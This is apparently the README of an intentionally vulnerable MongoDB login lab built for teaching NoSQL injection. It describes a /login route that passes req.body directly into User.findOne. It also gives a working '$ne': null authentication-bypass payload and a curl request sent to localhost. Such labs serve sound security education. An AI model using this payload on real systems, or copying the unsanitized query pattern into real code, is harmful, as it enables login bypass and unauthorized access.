README.md

🧪 NoSQL Lab (Educational Only)

This is a small educational application designed to demonstrate how a NoSQL (MongoDB) injection vulnerability can occur in poorly sanitized login logic.

⚠️ Important: This project is intentionally vulnerable and must not be used in real-world or production environments. It exists purely for learning and experimentation.

Tech stack:

• Node.js + Express
• TypeScript
• EJS templates
• MongoDB + Mongoose
• Bootstrap (via CDN)

---

🚀 Quick start (development)

1. Copy .env.example to .env and adjust values if needed:

   cp .env.example .env

2. Start MongoDB with Docker (optional):

   docker-compose up -d

3. Install dependencies and run the development server:

   npm install
   npm run dev

4. Seed the admin user (prints credentials to console):

   npm run seed

5. Open the site: http://localhost:3000

---

🕵️ How the vulnerability works

The /login POST endpoint directly passes req.body into:

User.findOne(req.body)

When sending JSON (Content-Type: application/json), a crafted object like:

{
  "username": {"$ne": null},
  "password": {"$ne": null}
}

can match any user document, bypassing authentication. This is intentional for learning how NoSQL injection works.

---

🔍 Example injected request (for lab learning only)

If you seeded an admin user and want to test the vulnerability:

curl -s -X POST http://localhost:3000/login \
  -H 'Content-Type: application/json' \
  -d '{"username":{"$ne":null},"password":{"$ne":null}}' -v

---

📚 Notes & Caution

• This repository (nosql-lab) is only for educational and research purposes. 🧑‍🏫
• It intentionally includes insecure patterns.
• In real applications, always sanitize input, validate query parameters, and apply proper authentication and hashing practices.
• Do not deploy this code to production or any publicly accessible environment.

---

✨ Enjoy exploring the lab and learning about secure coding!